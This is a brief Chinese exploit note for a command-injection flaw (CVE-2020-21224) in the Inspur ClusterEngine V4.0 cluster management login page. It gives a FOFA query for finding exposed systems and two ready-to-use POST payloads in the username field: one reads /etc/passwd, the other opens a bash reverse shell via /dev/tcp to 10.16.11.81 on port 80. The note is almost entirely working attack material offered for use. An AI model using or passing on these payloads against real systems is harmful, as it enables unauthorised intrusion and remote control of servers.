# 浪潮 ClusterEngineV4.0 集群管理系统 命令执行漏洞 (CVE-2020-21224)
FOFA:
title="TSCEV4.0"
登录处username存在RCE 可直接构造恶意参数进行命令执行:
```
POST /login.php
op=login&username=;`cat /etc/passwd`&password="
shell op=login&username=1 2\',\'1\'\); `bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.16.11.81%2F80%200%3E%261`
```
ref:
* https://cxsecurity.com/cveshow/CVE-2020-21224/
* https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul